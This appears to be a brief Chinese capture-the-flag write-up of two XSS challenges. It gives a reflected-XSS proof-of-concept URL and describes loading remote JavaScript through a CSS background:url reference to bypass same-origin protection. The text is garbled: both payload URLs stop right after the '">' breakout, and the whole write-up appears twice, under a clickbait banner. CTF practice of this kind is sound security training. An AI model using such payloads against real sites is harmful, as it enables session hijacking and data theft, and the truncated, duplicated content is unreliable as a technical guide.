为什么80%的码农都做不了架构师?>>> 
WEB01
XSS水题
直接提交poc吧
http://xxx.com/xss1.php?bug=">ssss
WEB02
这题需要我们构造远程js连接,通过CSS层级列表的background:url(http://xxx.com)方式去引入js,当然,我们需要绕过同源保护策略
GOGOGO我们的exp(PS我这儿只是做示范引入Jquery)
http://xxx.com/xss2.php?bug=">
为什么80%的码农都做不了架构师?>>>
XSS水题
直接提交poc吧
http://xxx.com/xss1.php?bug=">ssss
这题需要我们构造远程js连接,通过CSS层级列表的background:url(http://xxx.com)方式去引入js,当然,我们需要绕过同源保护策略
GOGOGO我们的exp(PS我这儿只是做示范引入Jquery)
http://xxx.com/xss2.php?bug=">